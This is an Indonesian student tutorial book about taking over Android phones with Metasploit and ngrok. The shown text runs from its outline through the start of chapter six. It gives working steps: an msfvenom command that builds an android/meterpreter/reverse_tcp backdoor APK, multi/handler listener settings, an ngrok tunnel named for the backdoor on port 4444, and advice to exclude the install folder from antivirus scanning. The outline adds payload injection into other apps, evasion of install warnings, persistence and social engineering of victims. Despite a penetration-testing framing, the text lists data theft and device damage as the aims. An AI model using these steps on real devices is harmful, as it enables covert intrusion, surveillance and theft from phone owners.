Pembajakan Android Melalui Internet Dengan Menggunakan Metasploit Dan Ngrok

2020
OLEH :
WIDIANTO EKA SAPUTRO
WIDIANTO EKA SAPUTRO | 170411100074

PEMBAJAKAN ANDROID MELALUI INTERNET
DENGAN MENGGUNAKAN METASPLOIT DAN NGROK
LEMBAR KESEPAKATAN
PEMBUATAN BUKU TUTORIAL
1. Nama Mahasiswa : Widianto Eka Saputro (170411100074)

2. Program Studi : Teknik Informatika
3. Jenis : Menyusun buku tutorial
4. Topik / Judul Buku : Pembajakan Android Melalui Internet Dengan Menggunakan Metasploit
Dan Ngrok
5. Outline Buku :
• Pengantar Penetration Testing
• Pengenalan Metasploit
• Pengenalan Ngrok
• Pembuatan Payload Backdoor Android
• Penggunaan Metasploit untuk mendapatkan akses melalui jaringan lokal
• Penggunaan Metasploit dan Ngrok untuk mendapatkan akses melalui internet
• Hal yang bisa dilakukan setelah mendapatkan akses Backdoor
• Injecting Backdoor Payload kedalam aplikasi android lain
• Mengatasi aplikasi Backdoor Payload terdeteksi tidak aman.
• Membuat Persistence Backdoor
• Social Enginering untuk membuat target menginstall Backdoor.apk
Bangkalan, 9 April 2020
BUKU TUTORIAL | 1
Widianto Eka Saputro (170411100074)
BUKU TUTORIAL | 2
LEMBAR PENGESAHAN
Telah diperiksa dan diuji oleh Pembimbing ‘

Pada Tanggal : ..............................................................
Dengan Nilai :................................................................
Menyetujui,
Dosen Penguji, Dosen Pembimbing,
Husni, S.Kom., M.T. Rosidah Vivin Nahari, S.Kom., M.T.

NIP. 19790722 200312 1 001 NIP. 19830608 200801 2 005
Mengetahui,
Koordinator Kerja Praktek,
Yoga Dwitya Pramudita, S.Kom., M.Cs.

NIP. 19840413 200812 1 002
BUKU TUTORIAL | 3
KATA PENGANTAR
Puji syukur kami panjatkan ke hadirat Tuhan Yang Maha Esa karena atas rahmat dan
karunia-Nya kami bisa menyelesaikan buku Tutorial ini untuk project KP (Kerja Praktek). Buku
ini dibuat dengan mempertimbangkan perkembangan dari mahasiswa , yang dikhususkan untuk
membantu ajar atau penunjang materi di perkuliahan. Selain itu, buku ini kami konsep untuk
kemandirian mahasiswa dalam melakukan latihan dalam mempelajari materi perkuliahan.
Kesuksesan belajar berawal dari kemauan dan ditunjang oleh berbagai sarana, salah satu
diantaranya adalah buku. Harapan kami, buku ini dapat membantu mahasiswa memahami tentang
tools yang akan dipelajari di perkuliahan dan mengenal tools untuk uji penetrasi keamanan pada
smartphone. Diharapkan setelah membaca buku ini , pembaca bisa lebih mengerti tentang resiko
dan kemanan pada smartphone Adroid.
Akhir kata kami mengucapkan terima kasih kepada semua pihak yang telah membantu
dalam membuat buku ini. Kritik dan saran sangat kami harapkan untuk perbaikan buku ini di
masa yang akan datang.
Selamat Belajar
Hormat Saya
Widianto Eka Saputro
BUKU TUTORIAL | 4
DAFTAR ISI
LEMBAR KESEPAKATAN
LEMBAR PENGESAHAN
KATA PENGANTAR
DAFTAR ISI
1....................................................................................................................................................... 8
PENGANTAR PENETRATION TESTING .................................................................................. 8
APA ITU PENETRATION TESTING ? .................................................................................... 8
APA SAJA LANGKAH – LANGKAH DALAM PENETRATION TESTING ? ..................... 8
APA HUBUNGAN PENETRATION TESTING DENGAN TUTORIAL PADA BUKU ?..... 9
2..................................................................................................................................................... 10
PENGENALAN METASPLOIT .................................................................................................. 10
TENTANG METASPLOIT ...................................................................................................... 10
JENIS-JENIS METASPLOIT .................................................................................................. 11
KELEBIHAN DAN KEKURANGAN METASPLOIT ........................................................... 12
METASPLOIT INTERFACE ................................................................................................... 13
TERMINOLOGI ....................................................................................................................... 15
DOWNLOAD METASPLOIT ................................................................................................. 16
CARA INSTALL METASPLOIT PADA SISTEM OPERASI WINDOWS .......................... 18
CARA INSTALL METASPLOIT PADA LINUX MINT ....................................................... 22
3..................................................................................................................................................... 27
BUKU TUTORIAL | 5
PENGENALAN NGROK ............................................................................................................ 27
APA ITU NGROK ? ................................................................................................................. 27
BAGAIMANA CARA KERJA NGROK ? .............................................................................. 28
DOWNLOAD DAN CARA INSTALL NGROK .................................................................... 29
SETTING NGROK ................................................................................................................... 30
4..................................................................................................................................................... 32
PEMBUATAN PAYLOAD BACKDOOR ANDROID ............................................................... 32
APA ITU PAYLOAD ? ............................................................................................................ 32
APA ITU BACKDOOR ? ......................................................................................................... 32
APA YANG BISA KITA LAKUKAN KETIKA KITA BERHASIL MENYISIPKAN

BACKDOOR ? ......................................................................................................................... 33
BAGAIMANA CARA MEMBUAT PAYLOAD YANG BERISI BACKDOOR ?................ 34
5..................................................................................................................................................... 37
PENGGUNAAN METASPLOIT UNTUK MENDAPATKAN AKSES BACKDOOR MELALUI

JARINGAN LOKAL .................................................................................................................... 37
BAGAIMANA MENDAPATKAN AKSES BACKDOOR YANG KITA BUAT ? ............... 37
6..................................................................................................................................................... 43
PENGGUNAAN METASPLOIT DAN NGROK ........................................................................ 43
UNTUK MENDAPATKAN AKSES MELALUI INTERNET ................................................... 43
BAGAIMANA MENDAPATKAN AKSES BACKDOOR KITA MELALUI INTERNET ? 43
7..................................................................................................................................................... 48
HAL YANG BISA DILAKUKAN SETELAH MENDAPATKAN AKSES BACKDOOR ....... 48
APA SAJA YANG BISA DILAKUKAN KETIKA KITA BERHASIL MENDAPATKAN

SESI METERPRETER ? .......................................................................................................... 48
BUKU TUTORIAL | 6
BEBERAPA CONTOH PENGGUNAAN ............................................................................... 55
8..................................................................................................................................................... 59
INJECTING BACKDOOR PAYLOAD KEDALAM APLIKASI ANDROID LAIN ................ 59
KENAPA KITA HARUS MENGINJECTKAN PAYLOAD KITA KE APLIKASI LAIN ? . 59
HAL HAL YANG DIBUTUHKAN SEBELUM INJECTING PAYLOAD ............................ 59
BAGAIMANA CARA MELAKUKAN INJECTING PAYLOAD KE APLIKASI ANDROID

LAIN ? ...................................................................................................................................... 60
BAGAIMANA SEBENARNYA CARA KERJA PROSES INJECTING PAYLOAD ? ........ 66
9..................................................................................................................................................... 71
MENGATASI APK TERDETEKSI TIDAK AMAN UNTUK DIINSTAL ................................ 71
MENGAPA APK YANG KITA BUAT TERDETEKSI TIDAK AMAN ? ............................ 71
BAGAIMANA CARA MELAKUKAN SIGNING SECARA MANUAL ? ........................... 72
10................................................................................................................................................... 77
MEMBUAT PERSISTANCE BACKDOOR ............................................................................... 77
APA ITU PERSISTENCE BACKDOOR ? .............................................................................. 77
BAGAIMANA CARA MEMBUAT PERSISTENCE BACKDOOR ? ................................... 78
11................................................................................................................................................... 82
SOCIAL ENGINERING AGAR TARGET MENGINSTALL PAYLOAD ................................ 82
APA ITU SOCIAL ENGINERING ? ....................................................................................... 82
METODE SOCIAL ENGINERING ......................................................................................... 83
DAFTAR PUSTAKA ................................................................................................................... 85
BUKU TUTORIAL | 7
1
PENGANTAR PENETRATION TESTING
APA ITU PENETRATION TESTING ?
Pengertian Penetration Testing adalah suatu kegiatan dimana seseorang mencoba

mensimulasikan serangan yang bisa dilakukan terhadap jaringan organisasi / perusahaan tertentu
untuk menemukan kelemahan yang ada pada sistem jaringan tersebut. Orang yang melakukan
kegiatan ini disebut penetration tester (disingkat pentester).
Tujuan Penetration Testing diantaranya adalah untuk menentukan dan mengetahui

serangan-serangan yang bisa terjadi terhadap kerentanan yang ada pada sistem, mengetahui
dampak yang diakibatkan dari hasil ekpoitasi yang dilakukan oleh penyerang.
APA SAJA LANGKAH – LANGKAH DALAM PENETRATION TESTING ?
Langkah-langkah dalam Penetration Testing:
1. Langkah pertama yang dilakukan pada Pentest adalah perencanaan. Pada tahapan ini harus
dibicarakan ruang lingkup dan juga ketentuan dari penetetration testing yang akan
dilakukan.
2. Langkah berikutnya adalah information gathering dan analysis. Pada tahapan ini
dikumpulkan semua informasi tentang sistem target.
3. Langkah selanjutnya adalah vulnerability detection (pencarian celah keamanan). Setelah
mengetahui informasi tentang sistem, pencarian celah keamanan bisa dilakukan manual
atau secara automatis dengan tool tertentu.
4. Setelah menemukan celah keamanan, maka langkah berikutnya adalah percobaan
penyerangan (penetration attempt). Pada proses ini dilakukan penentuan target, pemilihan
tools dan exploit yang tepat. Umumnya diperlukan juga kemampuan password cracking.
BUKU TUTORIAL | 8
Cara lain yang dapat dilakukan adalah dengan melakukan social engineering dan pengujian
physical security dari sistem.
5. Tahap berikutnya adalah analisis dan pembuatan laporan. Disini biasanya dilaporkan
tentang langkah kerja yang dilakukan, celah keamanan yang ditemukan serta usulan
perbaikan. Tahapan selanjutnya biasanya tindak lanjut, yang biasanya harus dilakukan
bersama-sama dengan admin untuk memperbaiki sistem.
APA HUBUNGAN PENETRATION TESTING DENGAN TUTORIAL PADA BUKU ?
Pada buku ini , kita akan melakukan suatu serangan kepada seseorang / sekelompok orang
, tentunya jika kita asal melakukan penyerangan , hal tersebut tergolong tindakan kejahatan. Maka
dari itu pada buku ini kita dikenalkan terlebih dahulu dengan istilah “Penetration Testing” dimana
pada Penetratioin Testing kita bisa melakukan simulasi serangan dengan tujuan untuk mengetahui
kelemahan suatu sistem. Nantinya seseorang/sekelompok orang tersebut akan kita arahkan agar
bisa menanggulangi serangan dan memperkuat tingkat kemanan pada sistem yang mereka
gunakan.
BUKU TUTORIAL | 9
2
PENGENALAN METASPLOIT
TENTANG METASPLOIT
Metasploit adalah sebuah proyek keamanan komputer yang dapat menyediakan informasi
tentang kerentanan keamanan dan membantu dalam pengujian penetrasi dan pengembangan
signature IDS. Metasploit memiliki beberapa sub proyek. Metasloit merupakan software security
yang sering digunakan untuk menguji cob tahanan suatu sistem dengan cara mengeksploitasi
kelemahan software suatu sistem.
The Metasploit Project adalah proyek yang dikembangkan oleh Rapid7, proyek ini
mengembangkan sistem yang menyediakan informasi kerentanan pada suatu kemanan komputer
dan mengembangkan source code yang memungkinkan suatu jaringan masuk ke jaringan sendiri
untuk mengidentifikasi resiko keamanan pada jaringan tersebut. Metasploit ini juga kadang bisa
BUKU TUTORIAL | 10
menjadi software penyerang ke sistem komputer yang mencari kelemahan dalam keamanannya,
dan agar dapat memperoleh akses ke data dan fitir-fitur dari komputer tersebut.
Penciptaan proyek yang paling terkenal adalah Metasploit Framework. Metasploit

Framework adalah sebuah platform perangkat lunak untuk mengembangkan, menguji, dan
melaksanakan eksploitasi. Metasploit awalnya diciptakan sebagai alat jaringan portable oleh HD
Moore pada tahun 2003 kemudian diakuisisi oleh perusahaan keamanan jaringan Rapid7 pada
tahun 2009. (TechTarget, 2011).
JENIS-JENIS METASPLOIT
Berikut ini adalah beberapa jenis metasploit sebagai berikut:
a) Metasploit framework
Metasploit framework merupakan sebuah penetration tool yang cukup powerfull
untuk melakukan penetrasi kedalam sebuah system. Metasploit framework bisa juga
dikatakan sebagai sebuah platfrom pengembangan untuk membuat tool security dan
exploit.
Berikut ini adalah langkah dasar untuk mengekploitasi suatu sistem yaitu:
 Memeriksa apakah sistem target yang dimaksud rentan terhadap metode exploit yang
dipilih.
 Memilih dan mengkonfigurasi exploit (kode yang memasuki sistem target dan
mengambil keuntungan dari salah satu bug)
 Memilih metode encoding sehingga intersion-prevention system (IPS) mengabaikan
muatan data yang diencoding
 Memilih dan mengkonfigurasi payload (kode yang akan dieksekusi pada sistem target
setelah berhasil masuk).
 Melaksanakan exploitasi
BUKU TUTORIAL | 11
Berikut ini adalah kegunaan metasploit framework dalam berbagai bidang:
 Demo atau prensentasi

 Administrasi sistem untuk menverifikasi instalasi dan patch sistemnya.
 Vendor produk untuk melakukan tes kelemahan dan peneliti-peneliti keamanan lainnya
didunia
 Melakukan Uji Penetrasi pada bidang kemanan jaringan
 Riset dan penelitian eksploitasi keamanan
 Tes IPS/IDS
 Legal hacking
b) Metasploit Payload
Payload merupakan bagian dari perangkat lunak yang memungkinkan untuk

mengendalikan sistem komputer setelah sudah dieksploitasi. Payload ini biasanya melekat
apabila sudah berhasil dieksploitasi. Payload metasploit yang paling populer disebut
meterpreter yang memingkinkan kita untuk melakukan berbagai macam hal pada sistem
target.
KELEBIHAN DAN KEKURANGAN METASPLOIT
Kelebihan dan kekurangan Metasploit
a) Kelebihan Metasploit
Berikut ini adalah beberapa kelebihan metasploid sebagai berikut:
 Kita bisa melakukan penetrasi untuk komputer lain meskipun itu dari luar LAN kita.
BUKU TUTORIAL | 12
 Tidak perlu mendapatkan akses untuk menggunakan komputer target selama exploit
kita sudah berhasil.
b) Kekurangan Metasploit
Berikut ini adalah beberapa kekurangan metasploit sebagai berikut:
 Susah untuk menembus firewall.

 Tidak semua komputer bisa kita targetkan tergantung pada jenis koneksinya dan
kemanannya (Antivirus & Firewall)
METASPLOIT INTERFACE
Berikut ini adalah beberapa contoh metasploit interface sebagai berikut:
a) MSFConsole
MSF Console merupakan all in one atau konsol terpusat dan memungkinkan
pengguna lebih efisien karena untuk hampir semua pilihan yang tersedia di metasploit
framework. Seperti toko serba ada untuk semua impian eksploitasi.
Kita dapat menggunakan msfconsole untuk melakukan berbagai hal, termasuk
meluncurkan exploit, memuat modul tambahan, melakukan penghitungan, menciptakan
pendengar(listener) , atau menjalankan eksploitasi massal terhadap seluruh jaringan.
Meskipun Kerangka Metasploit terus berubah, sebagian dari perintah tetap relatif konstan.
Dengan menguasai dasar-dasar msfconsole, Kita akan dapat mengikuti perubahan apa pun.
MSF Console ini adalah interface yang kebanyakan akan kita gunakan dalam
memngikuti tutorial pada buku ini. Namun MSF Console juga mempunyai kelebihan dan
kekurangan tertentu
BUKU TUTORIAL | 13
Berikut ini adalah kelebihan MSFConsole sebagai berikut:
 Menyediakan antarmuka berbasis konsol untuk framework

 Mendukung full read line, tabbing dan commad completion
 Merupakan interface yang memiliki banyak fitur dan merupakan yang paling stabil.
 Merupakan interface satu-satunya yang dapat mengakses sebagian fitur yang ada pada
metasploit
b) MSFCLI
MSFcli merupakan interface yang menggunakan command line untuk
menggunakan metasploit.
Berikut ini adalah kelebihan MSFcli sebagai berikut;
 Mendukung peluncuran eksploitasi dan modul tambahan
 Dapat menangani tugas tertentu yang lebih spesifik
 Baik untuk pembelajaran, karena tidak menggunakan fitur otomatis seperti yang
dimiliki msfconsole
 Cocok digunakan untuk pengujian atau mengembangkan eksploitasi yang baru.
Untuk kekurangan MSFcli yaitu tidak mendukung banyak fitur sebaik MSFconsole dan
hanya dapat menangani satu shell dalam satu waktu, sehingga lebih praktis untuk
menggunakan serangan client-side.
c) Armitage
Armitage merupakan salah satu interfaces Metasploit yang sudah menggunakan
grafis (GUI). Armitage ini adalah antarmuka yang dibuat oleh Raphael Mudge. antarmuka
ini sangat mengesankan, kaya fitur, dan tersedia secara gratis. Kami tidak akan membahas
armitage secara mendalam, tetapi jelas layak disebut sebagai sesuatu untuk dijelajahi.
Tujuan kami adalah untuk mengajarkan seluk beluk Metasploit, dan GUI luar biasa begitu
kita memahami bagaimana framework ini sebenarnya beroperasi.
BUKU TUTORIAL | 14
TERMINOLOGI
Sepanjang buku ini, kami akan menggunakan berbagai istilah yang pertama kali
memberikan beberapa penjelasan. Mayoritas istilah dasar berikut ini didefinisikan dalam konteks
Metasploit, tetapi mereka umumnya sama di seluruh industri keamanan.
Exploit
Exploit adalah cara yang digunakan penyerang, atau pen tester . dalam mengambil
keuntungan dari cacat dalam suatu sistem, aplikasi, atau layanan. Seorang penyerang
menggunakan exploit untuk menyerang suatu sistem dengan cara menghasilkan sesuatu
yang diinginkan. Eksploitasi yang umum termasuk buffer overflow, kerentanan aplikasi
web (seperti injeksi SQL), dan kesalahan konfigurasi.
Payload
Payload adalah kode yang kita inginkan untuk dieksekusi oleh sistem yang telah
kita pilih yang akan disampaikan oleh Framework.
Shellcode
Shellcode adalah seperangkat instruksi yang digunakan sebagai muatan ketika

eksploitasi terjadi. Shellcode biasanya ditulis dalam bahasa assembly. Dalam kebanyakan
kasus, sebuah perintah shell atau shell Meterpreter akan diberikan setelah serangkaian
instruksi telah dilakukan oleh mesin target.
Module
Modul dalam konteks buku ini adalah perangkat lunak yang dapat digunakan oleh
Framework Metasploit. Terkadang, Kita mungkin memerlukan penggunaan eksploit
module, komponen perangkat lunak yang melakukan serangan. Di waktu lain, sebuah
modul bantu mungkin diperlukan untuk melakukan tindakan seperti pemindaian atau
pencacahan sistem.
BUKU TUTORIAL | 15
Listener
Listener adalah komponen di dalam Metasploit yang menunggu koneksi masuk /

respon dari exploit kita. Misalnya, setelah mesin target dieksploitasi, missal melalui
internet. Listener menangani koneksi itu, menunggu mesin penyerang dihubungi oleh
sistem yang dieksploitasi.
DOWNLOAD METASPLOIT
Untuk melakukan download metasploit kita bisa mengunjungi link berikut

https://www.metasploit.com/download . Kita akan diarahkan menuju website dari metasploit.
Untuk download , terdapat 2 pilihan , yaitu Metasploit Framework dan Metasploit Pro.
Disini kita akan menggunakan metasploit framework. Kita klik download , maka kita akan
diarahkan ke laman github .
BUKU TUTORIAL | 16
Bisa kita lihat terdapat pilihan operating system disana. Kita bisa memilih sesuai operating
system kita , namun disini saya akan menjelaskan tutorialnya dengan menggunakan sistem operasi
Linux , atau lebih tepatnya Linux Mint.
BUKU TUTORIAL | 17
CARA INSTALL METASPLOIT PADA SISTEM OPERASI WINDOWS
Berikut adalah cara install metasploit pada sistem operasi windows :
1. Jalankan file “metasploitframework-latest.msi” yang telah kita download pada website

download metasploit sebelumnya.
2. Setelah dijalankan maka tampilannya adalah sebagai berikut
3. Klik Next , maka kita akan diarahkan pada halaman End-User License agreement.
4. Checklist pada “I accept the terms in License Agreement”. Kemudian klik next
BUKU TUTORIAL | 18
5. Pilih Folder tempat kita menginstall Metasploit dengan cara klik browse.
6. Disini saya membuatkan folder baru pada local disk C , dengan nama folder MSF, double
klik pada folder tersebut dan klik “OK”
7. Selanjutnya pergi ke antivirus , dan kita buat exlusion untuk folder tempat kita menginstall
metasploit , disini antivirus yang saya gunakan adalah windows defender. Tujuannya
adalah agar file yang ada pada metasploit tidak terkena scan oleh antivirus kita , jadi
metasploit bisa bekerja dengan semestinya.
BUKU TUTORIAL | 19
8. Setelah folder ditambahkan , selanjutnya kita lanjutkan langkah instalasi metasploit.

9. Setelah kita tadi menentukan folder tempat instalasi metaspoit , selanjutnya kita klik
“Next”.
10. Pada tahap ini metasploit sudah siap untuk di install , kita klik install untuk menginstall
metasploit
BUKU TUTORIAL | 20
11. Tunggu prosess instalasi metasploit berjalan hingga selesai.
12. Setelah proses instalasi selsai selanjutnya klik “Finish”.
BUKU TUTORIAL | 21
CARA INSTALL METASPLOIT PADA LINUX MINT
Berikut adalah cara instalasi metasploit pada linux , cara ini bekerja untuk semua linux yang
berbasis Ubuntu:
1. Download metasploit terlebih dahulu , untuk metasploit yang saya gunakan , bisa didownload
pada halaman berikut :
https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
2. Setelah download , maka pergi ke folder tempat download kita menggunakan terminal dengan
akses root . lalu ketikkan perintah
sudo chmod +x metasploit-latest-linux-x64-installer.run

sudo ./metasploit-latest-linux-x64-installer.run
BUKU TUTORIAL | 22
3. Setelah itu jendela instalasi metasploit akan terbuka.
4. Klik Forward , maka akan tampil jendela License Agreement , pilih “I Accept the agreement”
kemudian klik Forward.
5. Selanjutnya pilih folder tempat kita akan menginstall metasploit , disini saya menempatkannya
pada folder “/opt/metasploit”. Setelah itu klik forward.
BUKU TUTORIAL | 23
6. Akan muncul jendela yang menyatakan bahwa kita bisa menginstall metasploit sebagai service
, plih “Yes” kemudian klik forward.
7. Selanjutnya akan muncul jendela yang menyatakan bahwa kita diminta untuk mendisable
firewall dan antivirus, klik “Forward”.
8. Selanjutnya akan muncul jendela Metasploit service , disini kita diminta menentukan akan
dijalankan pada port berapa Metasploit service ini. Disini saya isi SSL port dengan port “3790”
kemudian klik Forward.
BUKU TUTORIAL | 24
9. Selanjutnya kita akan diarahkan ke jendela Generate Certificate isi sesuai gambar berikut
,kemudian klik Forward.
10. Selanjutnya metasploit sudah siap diinstall , klik Forward. Dan tunggu proses instalasi
metasploit selesai.
BUKU TUTORIAL | 25
11. Metasploit sudah selesai di install , klik Finish.
12. Untuk menjalankan metasploit , kita tinggal membuka terminal dan mengarahkannya ke folder
yang kita tuju tadi “opt/metasploit/app”.
BUKU TUTORIAL | 26
3
PENGENALAN NGROK
APA ITU NGROK ?
Ngrok adalah sebuah tool untuk mengekspos server lokal di belakang NAT dan firewall ke
internet publik melalui terowongan yang aman. Dengan Ngrok kita bisa menghubungkan suatu
akses dari internet menuju ke jaringan local kita. Kita memberi informasi tentang pada port berapa
server web kita mlakukan Listen.
BUKU TUTORIAL | 27
BAGAIMANA CARA KERJA NGROK ?
Ngrok bekerja dengan cara kita mengunduh dan menjalankan program di mesin kita dan
menyediakannya dengan port layanan jaringan, biasanya server web. Port tersebut akan terhubung
ke layanan cloud ngrok yang menerima lalu lintas di alamat publik dan menyampaikan lalu lintas
itu ke proses ngrok yang berjalan di mesin kita dan kemudian ke alamat lokal yang kita tentukan.
BUKU TUTORIAL | 28
DOWNLOAD DAN CARA INSTALL NGROK
Untuk download Ngrok , kita hanya perlu menuju ke halaman downloadnya , yaitu
https://ngrok.com/download . Download sesuai dengan sistem operasi yang kita gunakan . Untuk
langkah instalasinya kita bisa mengikuti langkah instalasi yang disediakan oleh website Ngrok .
Untuk bisa menggunakan Ngrok , kita memerlukan Auth Token , Auth Token ini didapan
ketika kita mendaftarkan akun kita di website Ngrok. Untuk mendaftar di website Ngrok , kita
tinggal menuju ke halaman https://dashboard.ngrok.com/signup . dan mendaftar dengan email kita.
BUKU TUTORIAL | 29
Setelah mendaftar , kita bisa login ke akun kita. Ketika kita sudah login , kita akan
diarahkan menuju halaman dashboard kita di https://dashboard.ngrok.com/get-started/setup. Pada
halaman itu kita bisa melihat bagaimana proses setting up ngrok dan cara menghubungkan kea kun
Ngrok kita
Sampai disini kita sudah berhasil menginstall Ngrok , dan bisa menggunakan Ngrok. Untuk
pengguna gratisan , kita hanya bisa melisten 1 protokol pada satu waktu , jika ingin lebih , kita
harus upgrade ke premium . Namun tenang saja , nantinya saya akan menjelaskan cara setting agar
Ngrok kita bisa melisten lebih dari 1 protokol walaupun kita pengguna gratisan.
SETTING NGROK
Disini kita akan melakukan beberapa setting sederhana , sehingga Akun Gratis Ngrok kita
yang hanya bisa melakukan 1 tunneling saja , bisa melakukan multiple tunneling , berikut adalah
caranya :
1. Buka Terminal dengan akses root / super user .
2. Buka file berikut dengan menggunakan text editor kita “leafpad ~/.ngrok2/ngrok.yml” ,
disini saya menggunakan text editor leafpad.
BUKU TUTORIAL | 30
3. Jika file sudah dibuka , maka bisa dilihat disana terdapat auth token milik kita. Selanjutnya
kita tambahkan beberapa code sebagai berikut .
tunnels :
http_apache:
proto: http
addr: 80
tcp_ssh:
proto: tcp
addr: 22
tcp_backdoor:
proto: tcp
addr: 4444
4. Setelah ditambahkan , kemudian simpan dan tutup file tersebut , lalu kita coba jalankan
ngrok dengan perintah “./ngrok start -all”. Maka bisa kita lihat Tunneling Ngrok berjalan
lebih dari 1
BUKU TUTORIAL | 31
4
PEMBUATAN PAYLOAD BACKDOOR ANDROID
APA ITU PAYLOAD ?
Payload adalah kode yang kita inginkan untuk dieksekusi oleh sistem yang telah kita
targetkan yang akan disampaikan oleh Framework (dalam hal ini Metasploit) kepada kita.
APA ITU BACKDOOR ?
Backdoor adalah perangkat lunak yang digunakan untuk mengakses sistem, aplikasi, atau
jaringan tanpa harus menangani proses autentikasi. Backdoor dapat membantu user yang membuat
BUKU TUTORIAL | 32
backdoor (peretas) dapat masuk ke dalam sistem tanpa harus melewati proses autentifikasi.
Backdoor juga dapat diartikan sebagai mekanisme yang digunakan untuk mengakses sistem atau
jaringan.
Awalnya backdoor dibuat para programmer untuk mendapatkan akses khusus untuk masuk
ke dalam program yang mereka kembangkan. Apalagi saat terjadi masalah pada program mereka,
seperti crash maupun masalah yang diakibatkan oleh bug. Pada saat terjadi masalah itu, backdoor
menjadi salah satu solusi yang berhasil dibuat.
Namun, sejalan dengan perkembangan teknologi informasi, backdoor yang sebelumnya

menjadi solusi, saat ini menjadi salah satu celah yang digunakan mengambil akses sistem secara
paksa. Backdoor disisipkan ke dalam kode sistem maupun sebuah program secara diam-diam
sehingga pengguna tidak mengetahui ada backdoor pada sistemnya. Akibatnya, pembuat backdoor
tadi dapat masuk dan mendapatkan akses ke dalam sistem pengguna bahkan dapat mengakses
keseluruhan sistem.
APA YANG BISA KITA LAKUKAN KETIKA KITA BERHASIL MENYISIPKAN

BACKDOOR ?
Hal – hal yang bisa kita lakukan ketika kita berhasil menyisipkan backdoor pada Payload yang
nantinya kita buat adalah untuk bisa melakukan aktivitas berikut:
 Pencurian data
 Pembajakan Smartphone Android
 Merusak sistem
 Menaruh virus pada Smarthone Android
BUKU TUTORIAL | 33
BAGAIMANA CARA MEMBUAT PAYLOAD YANG BERISI BACKDOOR ?
Berikut cara membuat payload backdoor :
1. Untuk membuat payload backdoor , pertama kita jalankan terminal / command prompt lalu
pergi menuju folder “metasploit/app” terlebih dahulu dengan akses root . Jika kalian
menggunakan windows , maka pergi ke folder “metasploit-framework/bin/” jangan lupa ketika
membuka command prompt pastikan untuk “Run as administrator”
1. Setelelah itu kita bisa membuat payload dengan perintah berikut :
msfvenom -p android/meterpreter/reverse_tcp LHOST=Listen_Host LPORT=Listen_Port R -o

direktori_folder_output/nama_backdoor.apk
Penjelasan :
msfvenom : adalah fitur metasploit yang digunakan untuk membuat payload.
BUKU TUTORIAL | 34
-p : Payload
android/meterpreter/reverse_tcp : modul metasploit yang akan digunakan
LHOST : Listen Host
LPORT : Listen Port
R : Raw format
-o : Output (hasil eksekusi akan ditempatkan pada direktori mana dan juga nama dan format
file apa)
2. Selanjutnya tinggal kita eksekusi perintah diatas pada terminal.
3. Untuk hasil dari payloadnya kita bisa melihat pada tempat kita menentukan direktori output
dari payload yang kita buat
BUKU TUTORIAL | 35
Sampai disini kita sudah berhasil membuat payload Backdoor.apk , Ketika target menginstall file
apk yang kita buat , file akan mengeksekusi payload yang berisi backdoor , backdoor tersebut
mempunyai Listen Host dan Listen Port yang nantinya Host dan Port tersebut akan kita Listen
dengan menggunakan metasploit console , sehingga kita bisa mendapatkan akses terhadap
Smartphone Android target.
BUKU TUTORIAL | 36
5
PENGGUNAAN METASPLOIT UNTUK MENDAPATKAN
AKSES BACKDOOR MELALUI JARINGAN LOKAL
BAGAIMANA MENDAPATKAN AKSES BACKDOOR YANG KITA BUAT ?
Setelah sebelumnya kita berhasil membuat payload yang berisikan backdoor , selanjutnya
bagaimana kita mendapatkan akses backdoor tersebut ?. Tentunya pertama kita perlu target agar
menginstall backdoor yang kita buat.
Sebagai contoh saya akan menginstall backdoor yang telah dibuat tadi . Karena Laptop dan
Smartphone Android saya berada pada satu jaringan lokal. Maka saya akan menjelaskan tentang
bagaimana cara mendapatkan akses backdoor yang kita buat pada jaringan lokal.
BUKU TUTORIAL | 37
1. Buka metasploit dengan cara membuka terminal/command prompt dengan akses

root/administrator dan mengarahkannya menuju ke direktori “Metasploit/app”. Jika kalian
menggunakan windows , maka pergi ke folder “metasploit-framework/bin”.
2. Buka ketikkan perintah “Msfconsole”.
3. Tunggu proses msfconsole terbuka.
4. Berikut adalah tampilan ketika msfconsole terbuka
Banner yang ditampilkan memang berbeda , karena banner yang disediakan oleh metasploit
diatur secara acak.
BUKU TUTORIAL | 38
5. Kita pilih exploit yang kita gunakan dengan cara mengetikkan perintah
use exploit/multi/handler
6. Kemudian kita pilih modul payload yang akan kita gunakan , dengan cara mengetikkan
perintah
set PAYLOAD android/meterpreter/reverse_tcp
7. Selanjutnya set LHOST dan LPORTnya , perlu diketahui karena target kita ada pada jaringan
lokal , maka pastikan ketika pembuatan payload dan ketika eksekusi msfconsole LHOST dan
LPORTnya adalah sama. Untuk set LHOST dan LPORT pada msfconsole ,caranya adalah
dengan mengetikkan perintah sebagai berikut
set LHOST 192.168.43.188
set LPORT 8888
8. Setelah smuanya selesai , kita tinggal menjalankan perintah “Exploit” maka msfconsole akan
mulai menjalankan reverse_tcp handler , dimana msfconsole akan mulai bersiap menangkap
session Meterpreter pada Lhost dan Lport yang telah kita atur tadi.
BUKU TUTORIAL | 39
9. Selanjutnya pastikan target sudah menginstall backdoor yang telah kita buat.
BUKU TUTORIAL | 40
Pada beberapa Smartphone Android yang tingkat keamanannya sudah cukup tinggi , file
backdoor apk yang kita buat tadi akan dianggap sebagai file tidak aman untuk diinstal , namun
terdapat cara untuk menyisipkan file backdoor kita sehingga file yang kita berikan kepada
target tidak terdeteksi sebagai file tidak aman , caranya akan saya bahas pada point berikutnya
yaitu point “Injecting backdoor payload kedalam aplikas android lain”. Jika mmuncul
pemberitahuan seperti diatas , pilih tetap install.
10. Setelah target menginstall backdoor , pastikan target membuka aplikasi yang berisi backdoor ,
disini karena aplikasi yang kita buat memang backdoor sederhana , maka ketika aplikasi dibuka
, aplikasi tersebut akan tertutup sendiri . Namun itu bukan berarti eror , hanya saja memang
karena aplikasi yang kita buat tidak memiliki tampilan apapun.
11. Setelah target membuka aplikasi , kita bisa melihat respon dari metasploit console , bahwa ada
1 session meterpreter yang tertangkap.
BUKU TUTORIAL | 41
12. Sampai tahap ini kita sudah berhasil mengakses backdoor yang kita buat. Kita bisa melakukan
banyak hal tentunya , namun untuk hal hal yang bisa dilakukan akan saya bahas pada point
berikutnya yaitu “Hal yang bisa dilakukan setelah mendapat akses Backdoor”
Sampai pada point ini kita sudah bisa mengerti cara kerja dari metasploit untuk melakukan
peretasan android , namun pada point ini kita hanya bisa melakukannya pada jaringan lokal saja ,
ketika kita dan target berada pada suatu jaringan yang sama , lalu bagaimana jika kita ingin
melakukannya jika target tidak berada pada satu jaringan ? . Hal tersebut akan kita bahas pada
point selanjutnya.
BUKU TUTORIAL | 42
6
PENGGUNAAN METASPLOIT DAN NGROK
